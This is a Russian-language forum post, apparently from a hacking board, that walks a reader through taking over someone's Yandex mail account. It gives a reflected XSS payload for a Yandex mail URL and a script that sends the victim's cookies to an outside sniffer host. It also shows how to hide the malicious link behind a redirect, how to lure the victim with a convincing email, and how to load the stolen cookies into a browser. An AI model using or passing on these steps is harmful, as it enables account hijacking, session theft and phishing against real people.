LeoN_Y на тебе пассивку на яндексе
PHP код:
http://mail.yandex.ru/abuse?folder=\&mesid=1530000000010265046"><script>alert()</script>
1)
Иди на
http://antichat.org/sniffer/add и делай себе сниффер
добавление: также можешь сварганить сниффер здесь:http://s.kanick.ru/
Например зарегишь себе ник Leon
Знач, адрес сниффера у тебя будет:
http://antichat.org/s/Leon.gif
Адрес просмотра логов:
http://antichat.org/s/Leon/log.php
2) Потом топай на
Nm.ru, регестрируй себе почту
Заходи на почту.
Создай текстовой файлик, в нём пропиши следущий код :
PHP код:
img=new Image(); img.src="http://s.netsec.ru/Leon.gif&"+document.cookie;
Теперь сохраняй файлик как j
.js
На почне nm.ru заходишь в раздел Мой сайт и загружаешь файлик
j.js.
Теперь этот файлик доступен по адрессу:
http://Leon.nm.ru/j.js
вместо Leon ставь свой логин на почте.
3)Регимся на
яндексе. заходим в почту.
В браузере вбиваем:
PHP код:
http://mail.yandex.ru/abuse?folder=\&mesid=1530000000010265046"><script%20src="http://Leon.nm.ru/j.js"></script>
Идём на свой сниффер:
http://antichat.org/s/Leon/log.php
Смотрим. Пришли куки. Хорошо.
4)
идём на сайт
loc.netsec.ruСоздаём перенаправление (а не то уж больно палевная ссылка):
Вбиваем там нашу ссылочку:
PHP код:
http://mail.yandex.ru/abuse?folder=\&mesid=1530000000010265046"><script%20src="http://Leon.nm.ru/j.js"></script>
и в ответ получаем
http://loc.netsec.ru/298.html.
Либо 2ой вариант,как спрятать xss ссылку, читаем тут читаем тут -
http://forum.antichat.ru/thread22898.html
5)
Теперь пишем нашей жертве на яндексе письмо со ссылкой http://loc.netsec.ru/298.html.
Письмо должно быть убедительное, чтоб жертва нажала на ссылку. Включи фантазию!
накрайняк пиши в пм, помогу.
6)
После отправки письма, сидим и ждём на сниффере его куки. Если жертва клюнет и нам пришлются куки, то в Опере (Инструменты>Дополнительно >Coocies)меняем свои куки на его и Вуа-ля, мы на его почте =)
PS:Не забудь, ВЕЗДЕ в моём тексте изменить Leon на свой логин.